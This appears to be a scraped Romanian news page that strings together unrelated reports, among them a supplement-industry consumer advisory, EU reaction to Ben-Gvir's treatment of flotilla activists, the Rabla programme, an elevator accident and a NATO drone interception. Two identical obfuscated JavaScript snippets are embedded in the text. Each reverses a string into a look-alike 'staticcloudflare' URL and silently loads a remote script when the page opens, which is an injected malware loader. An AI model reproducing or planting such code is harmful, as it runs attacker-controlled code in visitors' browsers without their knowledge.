PRISA subliniază că suplimentele alimentare notificate legal sunt produse reglementate la nivel european și sunt definite de Comisia Europeană ca surse concentrate de nutrienți sau alte substanțe cu efect nutrițional ori fiziologic, comercializate în forme dozate precum capsule, comprimate, tablete, pulberi sau lichide în doze măsurate. Acestea sunt destinate completării alimentației normale și nu pot fi promovate ca tratamente sau vindecări pentru boli.
Rolul suplimentelor și limitele lor în comunicarea către consumatoriPRISA arată că, atunci când sunt alese informat și utilizate responsabil, suplimentele alimentare pot susține un stil de viață echilibrat prin aport de vitamine, minerale, probiotice, acizi grași, extracte vegetale sau alte ingrediente cu rol în funcționarea normală a organismului. Totuși, mențiunile de sănătate utilizate în promovare trebuie să respecte registrul european al mențiunilor nutriționale și de sănătate și nu trebuie să inducă ideea că aceste produse tratează sau vindecă boli.
În România, suplimentele alimentare pot fi introduse pe piață doar pe baza unui certificat de notificare emis de Ministerul Sănătății și trebuie comercializate exclusiv sub formă preambalată. În același timp, industria subliniază că aceste produse nu sunt medicamente, nu înlocuiesc tratamentele medicale și nu pot fi prezentate ca alternativă la medicația recomandată de specialiști.
Poziția PRISA: toleranță zero față de fraude și reclame înșelătoare„Cazurile de fraudă nu trebuie să arunce o umbră asupra întregii industrii a suplimentelor alimentare. Dimpotrivă, ele arată cât de important este ca autoritățile să intervină ferm împotriva rețelelor ilegale, iar consumatorii să aleagă doar produse notificate, comercializate prin surse de încredere și promovate responsabil. PRISA susține toleranță zero față de practicile neloiale, reclamele mincinoase și folosirea abuzivă a imaginii medicilor, vedetelor sau instituțiilor publice”, a declarat Gerald Flintoacă-Filip, secretar general PRISA.
Organizația avertizează că mediul online este zona în care apar frecvent forme de dezinformare, inclusiv site-uri fără date de identificare, bloguri obscure, pagini de vânzare temporare, conturi false în social media, reclame agresive și testimoniale fabricate.
Cereri către autorități: controale mai stricte în mediul onlinePRISA solicită intensificarea controalelor și a monitorizării în mediul digital, unde astfel de practici sunt în creștere. Organizația cere implicarea coordonată a instituțiilor precum Ministerul Sănătății, ANPC, ANSVSA/DSVSA, ANAF, autoritățile din domeniul comunicațiilor digitale și organele de cercetare penală, acolo unde există indicii de fraudă.
Totodată, PRISA își exprimă disponibilitatea de colaborare cu autoritățile și susține utilizarea mecanismelor europene de alertă, control și schimb de informații, având în vedere caracterul transfrontalier al multor rețele ilegale.
Scopul acestor măsuri este identificarea rapidă a fraudelor, blocarea platformelor neconforme și protejarea consumatorilor din România și Uniunea Europeană.
Cum se pot proteja consumatorii: reguli simple pentru alegerea suplimentelorPRISA recomandă consumatorilor să cumpere suplimente alimentare doar din surse sigure și să evite produsele promovate prin promisiuni de vindecare rapidă, rezultate garantate sau înlocuirea tratamentelor medicale.
O sursă considerată sigură este un comerciant identificabil, care oferă produse notificate legal și informații complete despre acestea. În practică, sunt recomandate farmaciile, drogheriile, site-urile producătorilor sau distribuitorilor cunoscuți și marketplace-urile unde vânzătorii sunt clar identificați.
Un site de încredere trebuie să afișeze în mod vizibil numele companiei, CUI-ul, sediul, datele de contact, politica de retur și informații complete despre produs. Lipsa acestor elemente este un semnal de alarmă.
Consumatorii pot verifica produsele în registrele publice ale Ministerului Sănătății, inclusiv Registrul vitaminelor și suplimentelor, precum și în listele publicate de Institutul Național de Cercetare-Dezvoltare pentru Bioresurse Alimentare (IBA București), în cazul produselor pe bază de plante.
Unde pot fi raportate produsele suspectePRISA încurajează raportarea oricăror produse suspecte sau reclame înșelătoare către autoritățile competente, în funcție de situație: ANPC, Ministerul Sănătății, ANSVSA, ANAF sau ANCOM.
Sesizările pot viza site-uri fără date clare, produse care promit vindecări, reclame agresive sau lipsa informațiilor despre notificarea legală. Scopul este reducerea fraudelor și creșterea protecției consumatorilor pe piața suplimentelor alimentare.
5 pași simpli pentru alegerea unui supliment alimentar de încredere 1. Căutați numărul de notificare al produsuluiUn supliment alimentar comercializat legal în România trebuie să fie notificat. Verificați dacă numărul de notificare apare pe etichetă sau pe ambalaj. Dacă produsul este cumpărat online, verificați dacă acest număr este afișat și pe pagina produsului.
2. Verificați ca eticheta să fie în limba românăEticheta unui supliment alimentar comercializat în România trebuie să fie în limba română și să includă mențiunea „supliment alimentar”, lista ingredientelor, modul de administrare, porția zilnică recomandată, avertismentele, termenul de valabilitate, lotul și datele producătorului, importatorului sau distribuitorului. O etichetă lipsă, incompletă, netradusă în limba română sau tradusă neclar este un semnal de alarmă.
3. Verificați cine este comerciantulCumpărați doar de pe site-uri care afișează clar numele companiei, CUI-ul, sediul, datele de contact și condițiile de retur. Evitați paginile unde nu este clar cine vinde produsul sau cum poate fi contactat comerciantul. Un comerciant de încredere este transparent și ușor de identificat și contactat.
4. Evitați promisiunile miraculoaseFormulări precum „vindecă”, „tratează”, „elimină boala”, „înlocuiește tratamentul prescris de medic”, „produs-minune”, „rezultat garantat” sau „fără niciun efect secundar” indică o comunicare înșelătoare.
5. Verificați reclamele care folosesc vedete, medici sau „specialiști”.Dacă un produs pare recomandat de o persoană publică, de un medic sau de un „specialist”, verificați dacă informația apare și pe canalele oficiale ale acestora. În fraudele online, imaginile unor medici, vedete sau instituții publice sunt adesea folosite fără acord, pentru a crea încredere falsă în produs.
Pentru persoanele cu afecțiuni cronice, femeile însărcinate sau care alăptează, copiii, vârstnicii și persoanele care iau tratamente medicamentoase, PRISA recomandă consultarea medicului sau farmacistului înainte de utilizarea unui supliment alimentar.
Mesajul PRISA pentru consumatori este simplu: informați-vă înainte de a cumpăra, alegeți surse sigure și nu înlocuiți niciodată tratamentul recomandat de medic cu produse promovate online ca soluții miraculoase.
„În numele guvernului italian, tocmai am solicitat oficial Înaltului Reprezentant, Kaja Kallas,
să includă în următoarea discuție a miniștrilor de externe ai UE adoptarea de sancțiuni împotriva ministrului israelian al securității naționale, Ben-Gvir, pentru actele inacceptabile comise împotriva flotilei, prin sechestrarea activiștilor în apele internaționale și supunerea lor la hărțuire și umilință, încălcându-i pe cei mai elementari drepturi ale omului”, a anunțat oficial vicepremierul Italiei, Antonio Tajani.
Ministrul israelian al securității naționale, Itamar Ben-Gvir, a declanșat o criză diplomatică după ce a publicat imagini cu forțele de securitate israeliene abuzând activiști internaționali reținuți în timp ce încercau să navigheze spre Gaza cu ajutoare.
„Tratamentul aplicat activiștilor Flotilei Global Sumud, inclusiv cetățenilor europeni, a fost degradant și inacceptabil”, a declarat Kallas, adăugând că conduita lui Ben Gvir este „nedemnă de oricine deține o funcție într-o democrație”.
Controversa a izbucnit după ce imaginile l-au arătat pe Ben Gvir vizitând centrul din Ashdod, unde erau ținuți activiștii în urma interceptării navelor lor de către marina israeliană. În videoclip, ministrul a fluturat un steag israelian în fața deținuților și a declarat: „Tabăra de vacanță s-a încheiat. Cei care acționează împotriva Statului Israel vor găsi o țară hotărâtă. Am Yisrael Chai.”
Trei activiști au fost duși la spital în urma violențelor israeliene, au declarat avocații care îi reprezintă pe membrii grupului. Ulterior, au fost externați. Alte zeci de persoane suspectează că au coaste rupte, ceea ce le-a cauzat probleme respiratorii, potrivit The Guardian.
Incidentul a declanșat o reacție internațională tot mai puternică, cel puțin cinci țări anunțând că intenționează să convoace ambasadori israelieni în semn de protest față de episod.
Critici au apărut și în rândul conducerii Israelului. Prim-ministrul Benjamin Netanyahu a apărat dreptul Israelului de a opri flotilele care încercau să ajungă în Gaza, descriindu-le drept inițiative pro-Hamas, dar a spus că comportamentul lui Ben Gvir nu reflectă „valorile și normele” țării.
Ministrul de externe Gideon Sa’ar s-a distanțat, de asemenea, de acțiunile ministrului, acuzându-l pe Ben Gvir că a afectat imaginea internațională a Israelului. Ben Gvir a respins criticile, insistând că activiștii care susțin Hamas trebuie să înțeleagă că Israelul nu mai este „un sac de box”.
Mai multe state s-au alăturat criticilor internaționale tot mai numeroase și convoacă ambasadori israelieni după videoclipul lui Ben Gvir care viza activiștii flotilei.
Marea Britanie, Canada, Germania, Olanda, Spania, Irlanda, Australia și Noua Zeelandă dar și România s-au arătat revoltate de comportamentul ministrului israelian.
Diana Buzioanu a fost întrebată joi când ar putea începe înscrierile pentru Rabla.
„Deci noi avem un termen de minim 10 zile de când punem ordinul în dezbatere. Așteptăm și un răspuns, o să trimitem astăzi o întrebare și am primit răspunsul de la Consiliul Concurenței, o să trimitem astăzi o întrebare și către MEDAT. După ce primim aceste răspunsuri, și noi sperăm să fie vorba de câteva zile în care să primim răspunsul, vom putea să punem în transparență ordinul. Ordinul va sta în transparență 10 zile și apoi se intră pe exact calendarul care a fost aplicat la Rabla și în anii anteriori”, a spus Diana Buzoianu.
Ministra Mediului a vorbit despre modificările propuse în ceea ce privește mașinile care pot fi cumpărate. Ea a fost întrebată dacă românii ar putea să cumpere cu aceste vouchere doar mașini fabricate în Uniunea Europeană sau în Maroc, Turcia, Marea Britanie.
„Propunerea pe care o propunem către ministere, să vedem dacă este o propunere cu care celelalte ministere sunt de acord, este să avem mașini fabricate sau asamblate în Europa sau în statele care au convenții pe zona de Marea Mediterană. Deci practic, și UK, că UK are altă prevedere, alte tratate semnate la nivel de UE”, a spus Buzoianu.
Programul pentru persoane juridice, suspendatEa anunță o limitare în ceea ce privește achizionarea motocicletelor și mopedelor, cel mai probabil la 10% din buget.
Diana Buzoianu a anunțat și o modificare în ceea ce privește programul Rabla pentru UAT-uri.
„Anul trecut a fost lansat programul care avea vouchere pentru 25 de mașini pentru instituții publice. Am deschis proiectul acesta în limita a maxim 8 mașini pentru anumite categorii de instituții. Am scăzut la 5 sau la 6 mașini pe instituție”, a explicat Buzoianu.
Ministra a spus că programul Rabla pentru persoane juridice este suspendat și că va fi reluat „în momentul în care vom identifica bugetul necesar”.
În urma ședinței de Guvern de joi, purtătorul de cuvânt al Guvernului, Ioana-Nadina Dogioiu, a transmis că România va primi 14,3 milioane de euro de la UE.
Banii vin în urma implementării grantului din Fondul de Solidaritate al Uniunii Europene. Suma a fost aprobată de Comisia Europeană.
Zeci de persoane evacuate în mai – iunie 2025Suma va fi folosită pentru acoperirea unei părți din cheltuiele generate din cauza inundațiilor extreme produse începând cu luna mai 2025.
În perioada mai-iunie 2025, 125 de persoane din județele Brașov, Covasna și Harghita au fost evacuate în urma inundațiilor. Alte 27 de persoane au fost izolate în județul Neamț. Inundațiile au afectat și Salina Praid.
„Ne bucurăm că astăzi avem în sfârșit bugetul AFM aprobat”, a declarat ministrul.
Potrivit acesteia, proiectele mutate de pe PNRR pe AFM vor putea primi finanțările necesare pentru continuarea lucrărilor. Este vorba despre proiecte precum insule ecologice, centre de aport voluntar, platforme pentru gunoi de grajd și investiții în rețele de apă și canalizare.
Ministrul a spus că multe dintre șantiere au continuat lucrările, însă plățile nu puteau fi făcute până la aprobarea bugetului.
„În sfârșit vom avea resursele necesare”„Vorbim de peste 500 de proiecte care se află în această situație și care în sfârșit vor avea resursele necesare”, a afirmat Buzoianu.
Ea a precizat că o parte importantă dintre proiecte ar putea fi finalizate chiar în acest an.
Ministrul Mediului a anunțat și lansarea unui nou program pentru apă și canalizare, cu un buget de 1,5 miliarde de lei.
„Vorbim de un proiect care va ajuta România să nu mai fie în pericol de procedură de infringement”, a declarat Buzoianu.
Potrivit acesteia, România riscă sancțiuni și amenzi de sute de milioane de lei anual dacă investițiile nu sunt realizate.
Se vor împlini trei săptămâni de când Guvernul Ilie Bolojan a fost demis pe o moțiune de cenzură cu un număr record de voturi, iar clasa politică nu reușește să creioneze nicio formulă stabilă de viitoare guvernare.
Cine a greșit mai mult de România a reușit să rămână fără Guvern? Ce responsabilități au Ilie Bolojan dar și PSD în această criză? Ce soluții are președintele Nicușor Dan? De ce susținătorii președintelui României s-au mutat la Ilie Bolojan? De ce activiștii politici au nevoie de „Mesia” în România? Din punct de vedere democratic, ce este acela un „cordon sanitar”? Cum s-ar putea reduce clivajul între cele „două Românii”, separate de alegerile prezidențiale? Ce ar fi făcut Crin Antonescu dacă ar fi fost președinte? Care sunt prioritățile reale ale României?
Despre toate acestea și multe altele discutăm cu Crin Antonescu, fostul președinte PNL și fostul candidat la Președinția României.
Vineri, de la ora 13.00, în exclusivitate, pe Mediafax.
„Este din nefericire un eșec al diplomației românești, un eșec al Ministerului Afacerilor Externe, în mod special și un eșec al guvernării din ultimele luni. Pentru că atunci când o prestigioasă publicație, precum Politico, vorbește așa de țara ta, ei vorbesc în baza unor informații pe care le-au primit. Și este o realitate că din nefericire, mai ales în ultimile luni, România nu s-a exprimat așa cum trebuie, la nivel european”, a declarat Victor Negrescu, joi, la B1 TV.
Hub-ul de securitate maritimă și „lipsa de eficiență” a MAEÎn acest sens, europarlamentarul social-democrat a menționat și lipsa de progres în inițiative precum hub-ul european de securitate maritimă, despre care a spus că, deși este susținut la nivelul Comisiei Europene și al Parlamentului European.
„Vorbeam în urmă câteva săptămâni cu dumneavoastră despre hub-ul european de securitate maritimă. Comisia Europeană sprijină acest demers, uu, la nivelul Parlamentului European, am obținut bani pentru acest demers. El nu s-a materializat încă, tocmai prin lipsa de eficiență a diplomației românești”, mai spune Negrescu.
Ignorarea mecanismelor de cooperare interministerialăVicepreședintele Parlamentului European a mai criticat și lipsa de coordonare interministeriala în dialogul cu autoritățile europene, subliniind că mecanismele existente nu au fost utilizate suficient în ultimile luni.
„Avem un mecanism de coordonare în domeniul afacerilor europene, la nivelul Ministerului Afacerilor Externe, unde toate ministerele se prezintă și atunci când sunt subiecte mari, de anvergură europeană. Aceste sisteme nu au fost operaționale în ultimile luni, rareori s-au întâlnit și în sensul acesta România a ignorat aceste tematici”, mai spune Negrescu.
Politico: România, aproape absentă din diplomția de la BruxellesReacția liderului social-democrat vine în urma unui articol, apărut în presa internațională despre diplomația de la București. Jurnaliștii de la Politico consideră că România este aproape absentă din diplomația de la Bruxelles, în ciuda faptului că este al șaselea cel mai populat stat membru al Uniunii Europene și unul dintre principalii beneficiari ai fondurilor europene.
Publicația menționează că reprezentanța permanentă a României pe lângă UE este singura dintre cele 27 de state membre care nu are un purtător de cuvânt sau un responsabil de presă și care nu a emis un comunicat de presă în aproape un an.
Aceștia mai evidențiază și probleme tehnice care fac ca site-ul reprezentanței sau Ministerului Afacerilor Externe să fie frecvent nefuncționale.
„Din ce știu, a căzut de la etajul 4 și se pare că nu au funcționat frânele de siguranță, tamburii aceia. Trebuie făcută o expertiză să vedem mai exact”, a declarat Radu Raul Dorobanțu, Inspectorul Șef al ISCIR București.
„A căzut în puțul liftului la subsol și s-a oprit în tamburul de siguranță. E un tambur ca la de tren, dacă ați faceți o idee, care oprește liftul”, a declarat Dorobanțu, referindu-se la la arcurile masive situate în camera liftului la subsol, care au rolul de a opri un lift în cazul în care sistemele de frânare nu funcționează.
Acesta a precizat că ISCIR va da publicității un raport, în urma cercetărilor.
Potrivit inspectorului, ultima verificare a liftului s-a desfășurat în 9 aprilie 2026. Cu toate, Dorobanțu spune că verificarea tehnică nu se face de către ISCIR, ci de către CNCIR, Compania Națională pentru Controlul Cazanelor, Instalațiilor de Ridicat și Recipientelor sub Presiune.
„ISCIR-ul când se montează un lift sau se repară, se face o verificare tehnică de către cei de la CNICIR, care vin la ISCIR cu o fișă, pe care ISCIR-ul o aprobă dacă se îndeplinesc toate condițiile. Acesta a fost făcută. Mai demult, nu știu ce vă spun exact când, dar ultima verificare tehnică, care este periodică, e făcută pe 9 aprilie anul acesta, de către CNICIR”, a declarat Dorobanțu.
Dorobanțu acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apăruteAngajații ministerului Transporturilor care lucrau în clădirea Palatului CFR au acuzat că liftul, care funcționa, scotea zgomote zilele trecute. Cu toate acestea, Inspectorul Șef ISCIR București acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apărute.
„Ideea este că întreținătorii liftului și persoana desemnată care se ocupă aici, se numește responsabil cu verificarea tehnică, are obligația la fiecare incident de a anunțat ISCIR. Incidentul nu a fost anunțat, din păcate, deci nu știm să vă spunem mai multe detalii”, a declarat Dorobanțu.
Acesta a spus că în cazul în care o persoană este blocată în lift, se anunță. „În general, când sunt astfel de cazuri în care se blochează o persoană în lift sau așa, de obicei anunță. Nu de fiecare dată, dar anunță. Și atunci venim și facem un control și venim să facem vorba”, a declarat Dorobanțu.
Luni, un lift a căzut de la etajul 7Acesta a vorbit și despre incidentul de luni, în cadrul căruia mai multe persoane în lift au căzut în gol de la etajul 7. Atunci, liftul s-a oprit între parter și mezanim, etaj mai scurt situat între parter și etajul 1.
„A avut loc un incident asemănător, atunci a căzut de la etajul 7, dar atunci au funcționat frânele de siguranță, s-au împănat și liftul s-a oprit în siguranță undeva atât, așa, între parter și mezanim”, a declarat inspectorul șef al ISCIR București, Dorobanțu.
Declarațiile au fost date după ce, un lift a căzut în gol în clădirea Palatului CFR din subordinea Ministerului Transporturilor. În cadrul incidentului, 5 persoane se aflau în lift, dintre care două, un bărbat și o femeie, au fost duse la spital.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();
„Președintele României a avut astăzi o conversație telefonică cu Prim-ministrul Republicii Estonia, Kristen Michal.
Șeful Guvernului de la Talinn a mulțumit României pentru doborârea unei drone, intrate în spațiul aerian eston, de către un avion F-16 românesc din Detașamentul Carpathian Vipers.
Pentru a patra oară începând cu 2007, Forțele Aeriene Române asigură serviciul de Poliție Aeriană în statele baltice. La misiunea din acest an participă 6 aeronave F16 şi 101 militari.
România contribuie direct la securitatea aliaților săi și a întregului Flanc Estic”, a transmis Palatul Cotroceni.
Un avion F-16 românesc aflat în misiune NATO de poliție aeriană în statele baltice a doborât acum 3 zile o dronă ucraineană intrată în spațiul aerian al Estoniei. Incidentul a avut loc pe fondul unor interferențe masive de război electronic și bruiaj GPS în regiune.
Secretarul general al NATO, Mark Rutte, a lăudat acțiunea piloților români. El a subliniat că fiecare situație defensivă depinde de evaluările tactice din teren și de riscurile asupra populației civile.
Pilotul român implicat în această misiune de succes a fost propus pentru decorare oficială.
Astăzi, Letonia a emis o nouă alertă de amenințare aeriană în legătură cu o dronă intrată în spațiul aerian al țării iar NATO a ridicat avioanele de vânătoare pentru a 3-a zi consecutiv.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();
Antrenorul Naționalei Gheorghe Hagi și-a definitivat componența staff-ului tehnic, medical și de suport.
Selecționerul va colabora cu antrenori secunzii Cătălin Anghel, Ionel Gane, Cristi Sava (Analiză Video) și cu Ștefan Preda, antrenor de portar, a anunțat joi Federația Română de Fotbal.
Analiști video vor fi Vlad Lakatos și Andrei Butnăraș (Individual – Scouting), iar preparatori fizici Darius Hîmpea, Robert Hodorogea, Dan Curtifan (Prevenție – Recuperare).
Medicul Naționalei este Claudiu Stamatescu, iar din staff-ul medical fac parte Toma Vasilescu, Ovidiu Blendea, Adrian Gherovăț, Dragoș Paraschiv, Alin Burileanu, Constantin Crețu și Vivian Negoiță. Andrei Voica este bucătar-șef, Cristi Mărgărit nutriționist, Cătălin Gheorghiu team manager, Cătălin Popescu ofițer de presă, iar Alexandru Nicilă este ofițer securitate.
România va juca la început de iunie primele două meciuri cu Gheorghe Hagi pe bancă. Naționala întâlnește în 2 iunie Georgia în deplasare și în 6 iunie, pe teren propriu, jocă cu Țara Galilor.
Selecționerul Gheorghe Hagi a anunțat miercuri că România va juca cu două echipe în meciurle cu Georgia și Țara Galilor de la începutul lunii iunie.
